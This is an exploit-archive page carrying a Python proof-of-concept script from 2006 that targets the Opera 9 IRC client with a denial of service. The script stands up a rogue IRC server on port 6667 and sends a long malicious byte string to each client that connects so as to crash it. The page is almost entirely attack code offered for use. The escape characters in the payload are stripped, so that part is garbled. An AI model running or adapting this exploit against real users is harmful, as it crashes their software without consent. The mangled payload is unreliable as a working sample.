[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Opera 9 IRC Client Remote Denial of Service Exploit (py)
# Published : 2006-08-13
# Author : Preddy
# Previous Title : Opera 9 IRC Client Remote Denial of Service Exploit (c)
# Next Title : OpenMPT <= 1.17.02.43 Multiple Remote Buffer Overflow Exploit PoC
#!/usr/bin/python
#
# Opera 9 IRC client DOS
# NNP + Preddy
# http://silenthack.co.uk
# http://smashthestack.org
# http://www.team-rootshell.com
#
import socket
die = '''x3ax61x61x61x20x33x35x33
x20x15xf8x9cx71x0ax3ax64
xffx26xf8x9bx33xd2x9bx34
xa4xa7x7dx62xd1xa8x2fxb8
x9ax85x63x3ex1ex9exe6xa6
xb3xdex42x25xe8x7cx89xe7
xa2x81x83xd6x53x1ex0axf7
xc5x87x59x97x2fx88x4fxc9
x0dxb2x07x2bx50xedxd1x03
xcbx13x28xb3x90xb1x9bx32
x32x1ex08x85x3cx13x7cx02
x9axd6x99xcax5exe8x93x6c
x9ax9bx97xeax88x69xedx54
x7cx16x07x0cxc7xa2x3fxfa
xc0x47x7fxfdx5axfcxffxf5
xd2x98xbfx30x80x52x9cx1a
xedx34x04x76x9dxf1xcax19
x07xd1x26xcfx74x65xc9x34
xacx48x31x07x44x30xfcx16
xc8xbbx47x48x0dxe3x62xfb
x17x66x71xb4x58x3bxcex5f
x0cxf4x2ex80x59xf7xb5x05
x40xe6x0cx84x17x08x9bxdf
xc3xe2x28xd1xc5x8axccxdd
xf1x3dx91x49x78x5fxa8x84
x53xd7x05xacxcexbaxb2x0e
xa0xbex93xb7xc7x2ex97x8a
x10xbfx5bxd5x49x27xb2x3a
x64x44x83xdcxa3x2cx61xf7
x03x66xa3xd1x20x55xe0xc0
x14x73x78xdbxa1x0fx65xb1
xcexc1x86x17xe8x39x52x4d
x7dxd5x29x20x01x8ax17x04
xf0xbbxd6x10x10xb6xd1x24
x29x49xffxcax58x65x7bx26
x26x01x3dx0ex3ax8fx5bxb7
x65x85xd8x66x0fxefx6bx00
xaax41x10xbbxf7xe1xdfx20
x2axdfxeax82x44x65xa8x6a
x66xe6x78xa1x75xd4x58xda
x59x30x41x68x20xacx68xca
xedx79x85xe4x5ax65x04x85
x44xeex07x88x53xb0xf2xb9
x96x6ax5ax0bx3exb3xe6x97
xe3x27x00x03xd3x68xcexc0
xe1x53xa4x3cxb8xa8xc1xfc
x96xc8x84xe9x78x76xa2x0e
xe1xfdx1ax1fxb0x00xb7x93
x27xb7x97xfax1fx65xbax01
xb8x5ex3dx71x06xfex6dx9c
xc6xf2x85x3fx68x27x4dx49
x24x67x69xd4x67x20x68x8e
xd7xffx88xf6x64x42xf7x1c
xa0x34x8dxa6x32xfbx42xf9
xedxc7x38x55xefx85x9fx13
xedx08xe8x54x28x50xe3xff
x4fx6bxf5xb3xaexedxcfx4e
x21x5dxf5x54x58x37x4dx45
xffx85x9axeex0ax39x01xf7
x41xe9x4cx69x39x2fx68x88
x9ax5ex3bx48x4bx0bx97x6c
x68x8cxc0xc0xc3x0dx05xc2
x92x9fxb0x9dxd9xb2x94x1a
x9bxe0x84xd5x0fxecx5dxaa
x4ax99xf2x95xa4x89x02x0c
x15xc2xccxd9xd0xd1x9bx62
x70x4cxffx49xfex94x64x99
x74xe8x6ex84xd4xccx2ex1f
x65x20xb4x09xaaxb6x15xbf
x79xe1x98x49xb2x34xabx22
x80xabx6cx7ex3fxd0x17xb3
xb8x86x37x8cx52x65xabxb7
x86x60xc0x30x16xd5xefx8f
xb6x88xd8x68xbcx84x8ax3c
x2fxf6xbax6exc6xd1x21x7e
x57x59x0bxa9xbexb6x60x44
x16x20x74x2dxf5x64xbcxab
xecx95x13xa8x19x9exe4x48
x94x9exb6x5bx6fxd7xd9xc7
x30xe4x70xefx9bxd1x33xb1
xf1xa8xdexe7x0cx9bx92xf8
x30xa6xa0x49x44x84x91xd8
x22x47x33x91x1ex0dx58x4f
xf1xc9x3ex8cx9ax71x3ex8b
x19x1cx72x25xb7x05x1dxe7
xabxbdx30xefx41xc1xc7x63
x08xfbxf5x27x08x4dx76xf9
x16xb4x86xb0x25xc4x3cx3f
xe0xaex64x98xb3x82x7fx5e
x3fxb0x4dx81x71x15xe4x7a
x10xd9xa1x18x27x17x11x3d
xcbx97xeexf0x5bx2ax2fx3c
xd8x94xd4x8cx16x53xeax55
x03x38xd6x75x4dxbbxefx5d
x94x90x75xbbxa7x86xf9x72
x1exe7x62x79x11x92xb5xe9
x26x89x75x3cxddx60x91xe0
x98x68x55xe5x23x44x42xb7
xd4xb7x73x7bx3dx6cxedx5b
x53x50xd5x64xe2x8ax4dx08
x14xc3x44xf1x23xd5xd1xbb
x3dx27xa0x60x6bxe2x18x40
x99x8bxbbxd6xf7xa9x32x4a
xf9x07xaexdbx91xfbxe3xa5
xbex27x96xe1xfcx68x9cx3a
x8fx3cx9axfax1exb2x3axb7
x3dxf6x8ex34x9fxc0x7ex98
xc7x2cx73x58x28x56xfexe6
x7dx94xc8x79xfcx64xb3x8b
xa1x4ex86xbfx00xc0x77x3e
xb6x05x72x55xc5xf1xedx8c
x1dx60xe4x45xb6xe2x2cx33
x77xf4xadx73x58x60xffxf9
xaex85xb9xafx45x30xedxfc
x35x5fx51xfax50x3fx86x6e
x9fx6axb3x56x4dxdfx89xc4
xd3x36x37x2cx97x36x25x45
xbbxdexf4x01x0exe1xfdx43
x41x4ex3dx91x8dxc3xffx2d
x2exb3x83x7bx92x0cx3fx66
x43x76x92xdaxadxb7x1fx68
x96x14x69xa4xf5x66xe8x36
xb5x25xc8x42xe9xc7x6fx17
x7axf2x92x0dxffxd1x73x42
x47x05x1cxf4xbcx3bx5dx52
x4fxc6xf7x45x2dxdfx7bxe2
x04x43x24xedx0bx94x04x85
x86x96x92x85x67x05xc7xaf
'''
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("localhost", 6667))
s.listen(5)
while 1:
(clientsock, address) = s.accept()
sent = clientsock.send(die)
print "Sent %d bytes" % sent
sent = 0
# www.Syue.com [2006-08-13]